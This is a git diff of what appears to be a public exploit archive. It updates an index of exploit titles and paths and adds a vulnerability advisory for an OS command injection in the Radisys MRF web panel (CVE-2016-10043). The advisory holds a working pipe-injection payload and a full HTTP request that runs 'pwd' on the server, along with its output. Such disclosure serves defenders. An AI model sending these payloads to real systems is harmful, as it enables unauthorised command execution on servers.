 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
-4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80
+4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80
 4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0
 4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0
@@ -9620,7 +9622,7 @@ id,file,description,date,author,platform,type,port
 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0
 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
-4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
+4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128
 4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
@@ -9671,7 +9673,7 @@ id,file,description,date,author,platform,type,port
 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0
 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
-5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515
+5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
 5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
@@ -9703,12 +9705,12 @@ id,file,description,date,author,platform,type,port
 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
-5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80
+5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80
 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
 5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
 5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
-5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
+5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
@@ -9754,7 +9756,7 @@ id,file,description,date,author,platform,type,port
 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
-6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
+6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80
 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
@@ -10127,7 +10129,7 @@ id,file,description,date,author,platform,type,port
 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
-9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
+9993,platforms/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@@ -10222,7 +10224,7 @@ id,file,description,date,author,platform,type,port
 11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
-11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
+11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
 11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
 11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@@ -11169,7 +11171,7 @@ id,file,description,date,author,platform,type,port
 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
-17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
+17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@@ -12317,7 +12319,7 @@ id,file,description,date,author,platform,type,port
 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
-21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
+21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80
 40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@@ -13913,7 +13915,7 @@ id,file,description,date,author,platform,type,port
 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
-31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
+31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
 31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@@ -14731,7 +14733,7 @@ id,file,description,date,author,platform,type,port
 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
-36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
+36352,platforms/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
@@ -14774,7 +14776,7 @@ id,file,description,date,author,platform,type,port
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
-36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
+36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
 36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@@ -15063,7 +15065,7 @@ id,file,description,date,author,platform,type,port
 39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
 39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
-39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
+39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
 39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@@ -16057,7 +16059,7 @@ id,file,description,date,author,platform,type,port
 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
 1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0
 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0
-1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0
+1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0
 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0
 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
@@ -17056,7 +17058,7 @@ id,file,description,date,author,platform,type,port
 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
-2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
+2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps,0
 2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
 2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0
 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
@@ -22479,7 +22481,7 @@ id,file,description,date,author,platform,type,port
 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
-11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
+11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
@@ -37102,7 +37104,7 @@ id,file,description,date,author,platform,type,port
 41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
 41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
 41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
-41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
+41159,platforms/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
 41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
 41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
 41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
@@ -37112,7 +37114,25 @@ id,file,description,date,author,platform,type,port
 41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
 41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
 41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0
 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
+41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0
+41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
+41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
+41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
+41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
+41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
+41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
+41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb
index 8502f8411..6202b2bc6 100755
--- a/platforms/cgi/remote/40949.rb
+++ b/platforms/cgi/remote/40949.rb
@@ -1,4 +1,6 @@
 #
+# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
+#
 # Remote code execution in NETGEAR WNR2000v5
 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
 # Released on 20/12/2016
diff --git a/platforms/cgi/webapps/41179.txt b/platforms/cgi/webapps/41179.txt
new file mode 100755
index 000000000..f0c9218cd
--- /dev/null
+++ b/platforms/cgi/webapps/41179.txt
@@ -0,0 +1,78 @@
+Title: MRF Web Panel OS Command Injection
+Vendor: Radisys
+Vendor Homepage: http://www.radisys.com
+Product: MRF Web Panel (SWMS)
+Version: 9.0.1
+CVE: CVE-2016-10043
+CWE: CWE-78
+Risk Level: High
+
+Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
+ COSMOTE (OTE Group) Information & Network Security
+
+-----------------------------------------------------------------------------------------
+
+Vulnerability Details:
+
+The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
+attacks.
+
+Affected parameter: MSM_MACRO_NAME (POST parameter)
+Affected file: ms.cgi (/swms/ms.cgi)
+Verified Affected Operation: Show Fatal Error and Log Package Configuration
+
+It is possible to use the pipe character (|) to inject arbitrary OS commands
+and retrieve the output in the application's responses.
+
+
+Proof Of Concept:
+
+The attacker can login to the web panel as a standard user (non-administrator account)
+and inject the POST parameter: MSM_MACRO_NAME with the following
+payload: Show_Fatal_Error_Configuration|||a #' |||a #|" |||a #
+As a result the attacker receives the result of the command in the application response
+
+In order to reproduce the vulnerability:
+
+1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
+https://vulnsite.com/swms
+
+2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
+and send the following POST request in order to retrieve the output of the 'pwd' command:
+
+POST /swms/ms.cgi HTTP/1.1
+Host: vulnhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://vulnsite/swms/ms.cgi?MSM_SID=&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 213
+
+MSM_SID=&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
+
+3. You can see the output of the command 'pwd' in the server response:
+
+HTTP/1.1 200 OK
+Date: Thu, 21 Jul 2016 08:18:43 GMT
+Server: Apache
+Cache-Control: no-cache
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 23
+
+/var/opt/swms/www/html
+
+
+Vulnerability Impact:
+
+Application's own data and functionality or the web server can be compromised due
+to OS command injection vulnerabilities. It may also be possible to use the server
+as a platform for attacks against other systems.
+
+
+Disclaimer:
+
+The responsible disclosure policy has been followed
diff --git a/platforms/lin_x86-64/local/40489.txt b/platforms/linux/local/40489.txt
similarity index 100%
rename from platforms/lin_x86-64/local/40489.txt
rename to platforms/linux/local/40489.txt
